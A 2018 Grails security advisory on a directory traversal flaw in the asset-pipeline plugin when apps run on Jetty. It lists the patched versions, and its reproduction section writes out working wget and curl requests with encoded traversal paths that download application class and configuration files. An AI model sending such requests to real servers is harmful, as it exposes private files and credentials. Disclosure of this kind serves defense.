Security Vulnerability in Asset-Pipeline and Jetty
September 23, 2018
Tags: #plugins
Introduction
Asset-pipeline has been the default plugin for handling static assets in a Grails web application since Grails 2.4.0. A security vulnerability that involves asset-pipeline and Jetty has been identified.
Affected Versions
The vulnerability affects all asset-pipeline users that deploy Grails applications in Jetty, and it allows directory traversal and download any file knowing its specific directory.
Reproducing The Issue
- Create a new grails application:
grails create-app foo - In
build.gradlechange thespring-boot-starter-tomcattospring-boot-starter-jetty - Build a war file:
grails war - Deploy to Jetty
- Send the following request to download Application.class
wget localhost:8080/foo-0.1/assets/..%5c%5cfoo%5cApplication.class -O Application.class - It is also possible to download any any arbitrary file if the path is known. For example to download
application.ymlexecutecurl -v localhost:8080/foo-0.1/assets/..%5capplication.yml.
Fixing The Issue
The vulnerability has been addressed in recent versions of the asset-pipeline plugin:
- 2.14.1.1 for Grails 2.x
- 2.15.1 for Grails 3 and Java 7
- 3.0.6 for Grails 3 and Java 8